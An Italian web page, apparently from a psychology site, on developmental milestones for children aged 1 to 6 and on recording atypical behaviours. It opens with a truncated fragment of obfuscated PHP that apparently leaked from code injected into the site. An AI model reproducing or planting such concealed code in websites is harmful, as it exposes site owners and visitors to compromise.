=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Le tappe dello sviluppo del bambino (1-6 anni)

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

  

Bambini

Le tappe dello sviluppo del bambino (1-6 anni) PDF 

revisionato il 17 novembre 2013 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

Lo sviluppo psicomotorio del bambino segue un corso noto e prevedibile, fatto di tappe, la cui presenza serve per stabilire il grado di maturazione di un individuo. Le tappe non sono altro che abilità e comportamenti che emergono nel corso dello sviluppo individuale, e che costituiscono le basi per una buona crescita ed un corretto apprendimento. Gattonare, camminare, seguire semplici istruzioni, pronunciare parole singole, mettere insieme parole per formare frasi, sono esempi di tappe fondamentali.

Le tappe di sviluppo riguardano le seguenti aree:

  • Abilità cognitive (comprensione, livelli d’attenzione, capacità di notare i dettagli, pensiero, ragionamento, capacità di risoluzione dei problemi);
  • Linguaggio (abilità ricettive ed espressive);
  • Abilità motorie (saltare, ballare, tirare e afferrare, ammucchiare, disegnare);
  • Abilità sociali (iniziare i contatti con i coetanei, giocare in gruppo);
  • Autonomia (vestirsi, mangiare, lavarsi).

Non sempre i bambini raggiungono le tappe alla stessa età o velocità

Nonostante le tappe di sviluppo siano note e prevedibili, è naturale che siano presenti differenze tra individui e che, per esempio, un bambino mostri un ritardo rispetto ai coetanei nell’acquisizione di alcune delle tappe evolutive.

Ad una data età alcuni bambini possono essere già abbastanza avanti nel parlare, mentre altri stanno ancora scoprendo l’importanza delle parole; alcuni bambini possono avere notevoli abilità motorie, mentre altri possono ancora trovare difficoltà nei giochi di costruzione o simili.

Inoltre, lo stesso bambino può avere ritmi di sviluppo diversi in abilità appartenenti ad una stessa area; Per esempio, può capitare che un bambino abbia ottime capacità di comprensione della lingua parlata, ma mostri contemporaneamente difficoltà nell’esprimersi.

 

Alcuni bambini esibiscono abilità e comportamenti che, rispetto ai loro coetanei, appaiono notevolmente diversi o inusuali

 

Una certa cautela deve essere posta nel distinguere tra le abilità ed i comportamenti che tardano ad emergere e quelle abilità e quei comportamenti che, invece, sono diversi nella qualità, nella forma e nella funzione, e che denotano la presenza di uno sviluppo distorto.

 Non è sempre facile determinare se i comportamenti esibiti da un bambino sono il riflesso della sua personalità o, piuttosto, di uno sviluppo distorto; spesso è necessario l’aiuto di un esperto. E’ importante comunque, che genitori ed insegnanti si abituino a registrare con cura:

  • il momento in cui un’abilità o comportamento emerge;
  • gli eventi che hanno preceduto la sua emersione;
  • la qualità dell’abilità o del comportamento ed il contributo che può fornire al benessere del bambino.

I comportamenti atipici dovrebbero essere evidenziati e segnalati tempestivamente; essi potrebbero essere tanto eventi isolati e senza alcuna ripercussione sullo sviluppo futuro, quanto segnali precoci di disturbi importanti che si manifesteranno successivamente.

Evidenziare precocemente le anomalie comportamentali, è fondamentale perchè nella maggioranza dei casi consente di effettuare interventi che sono capaci di prevenire il manifestarsi del disturbo o di ridurre al minimo gli effetti negativi. Viceversa, ritardare la segnalazione, e quindi l’intervento, spesso può voler dire non riuscire a raggiungere esiti terapeutici altrettanto efficaci. 

In presenza di comportamenti atipici, genitori ed insegnanti farebbero bene ad annotare:

  • la data e l’ora in cui solitamente essi si verificano;
  • la loro durata e frequenza;
  • il luogo e l’attività che il bambino sta svolgendo;
  • l’area coinvolta (ad es., cognitiva, linguistica o motoria);
  • il tipo d’interazione con i coetanei ed, eventualmente, altre osservazioni che sembrano rilevanti.

 

FONTI D'INFORMAZIONE 

  1. Learning disabilities online
 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito